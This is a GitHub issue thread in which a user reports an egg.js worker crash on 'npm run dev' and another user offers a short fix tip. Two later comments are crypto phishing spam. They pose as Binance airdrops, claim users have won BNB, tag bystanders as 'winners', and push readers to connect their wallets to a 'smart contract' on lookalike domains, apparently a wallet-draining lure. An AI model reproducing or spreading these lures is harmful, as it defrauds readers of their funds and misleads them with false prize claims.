### ISSUE TITLE
npm run dev报错

### ISSUE THREAD

**Issue by Funtience** [xbc30/large-file-upload#1]
2020-11-04 15:31:43,372 ERROR 2124 nodejs.AppWorkerDiedError: [master] app_worker#1:7892 died (code: 1, signal: null, suicide: false, state: dead), current workers: []
    at Master.onAppExit (D:\其他\server\node_modules\egg-cluster\lib\master.js:510:21)
    at Master.emit (events.js:311:20)
    at Messenger.sendToMaster (D:\其他\server\node_modules\egg-cluster\lib\utils\messenger.js:137:17)
    at Messenger.send (D:\其他\server\node_modules\egg-cluster\lib\utils\messenger.js:102:12)
    at EventEmitter.<anonymous> (D:\其他\server\node_modules\egg-cluster\lib\master.js:353:22)
    at EventEmitter.emit (events.js:323:22)
    at ChildProcess.<anonymous> (internal/cluster/master.js:193:13)
    at Object.onceWrapper (events.js:418:26)
    at ChildProcess.emit (events.js:311:20)
    at Process.ChildProcess._handle.onexit (internal/child_process.js:275:12)     
name: "AppWorkerDiedError"
pid: 2124
hostname: DESKTOP-0V6F2MO

2020-11-04 15:31:43,392 ERROR 2124 [master] app_worker#1:7892 start fail, exiting 
with code:1
2020-11-04 15:31:43,393 ERROR 2124 [master] exit with code:1

**Comment by hello38** [comment]
检查ip修改的时候是否有空格！

**Comment by Idris933** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @georgelima, @nongjize, @jrampon, @mate-h, @0x-maker, @fver1004, @memoool

**Comment by highpolar-shubham** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @Razkolnikow, @oguzuslu, @zhaozha, @abelweiwencai, @ArnoldWolfstein, @ZoranPandovski, @jvrsolis
